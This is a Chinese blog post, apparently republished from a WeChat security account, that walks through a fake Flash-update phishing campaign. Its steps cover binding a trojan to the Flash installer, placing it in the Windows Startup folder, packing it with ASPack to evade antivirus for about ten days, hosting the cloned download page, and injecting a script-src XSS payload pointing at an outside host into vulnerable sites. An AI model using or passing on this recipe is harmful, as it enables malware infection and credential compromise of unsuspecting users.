flash钓鱼

  • A+
所属分类:安全文章

前言


flash钓鱼



        发现一个好玩的github项目,正好,最近手机上老是收到莫名的诈骗短信,我决定钓一波。

准备钓鱼套件https://github.com/r00tSe7en/Flash-Pop 美化版
https://github.com/hackxc/xss_flash 普通版


flash钓鱼

1.生成木马并捆绑flash的安装程序


flash钓鱼


 

将木马与flash安装程序捆绑一起

木马解压位置:windows的自启动目录,这个百度钓鱼钓时间长就知道了。你要高兴,放桌面都行。

这地方让对方下载后,不要急着让木马启动,电脑都会装杀毒,如果免杀不到位,一运行就凉了。所以开机启动是最保险。

C:ProgramDataMicrosoftWindowsStartMenuProgramsStartup

https://www.winrar.com.cn/   winrar下载地址


 

flash钓鱼


 

 

flash钓鱼

flash钓鱼

flash钓鱼

 

 

3、简单做一下木马免杀

我们选取的加壳软件是ASPack,语言改成中文。剩下打开木马,压缩就好了。

一般能免杀10天左右。


 

flash钓鱼



4
、在文件index.html “立即下载位置”链接改为 木马名字+后缀。放到目录。(这个页面可以直接访问使用)

由于是中英文切换的所以英文页面也要改一下。

flash钓鱼

flash钓鱼

flash钓鱼


5、修改一下version.js文件中的链接,为自己的钓鱼页面。(主要与XSS直接配合使用)

flash钓鱼

 


6、我比较喜欢用宝塔,我们新建一个站点,填好域名,改为静态后,将源码放入对应的网站目录下。

没有服务器和域名怎么办 http://www.webweb.com/   香港云可以白嫖

flash钓鱼

flash钓鱼

7、下面开始钓鱼

如果你想利用XSS钓鱼

可以使用src标签 构造payload:<scriptsrc="http://www.xx.com/Flash.cn/version.js"> </script>

提示:护网中最好使用域名相近的域名。

我们找一个存在XSS的网站,在存在异常的参数位置,输入构造的payload,点击确定后,就会跳转到我们钓鱼页面。


flash钓鱼

flash钓鱼



8、对方下载安装后,成功上线。


 

flash钓鱼

 

 

 


本文始发于微信公众号(Khan安全攻防实验室):flash钓鱼

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: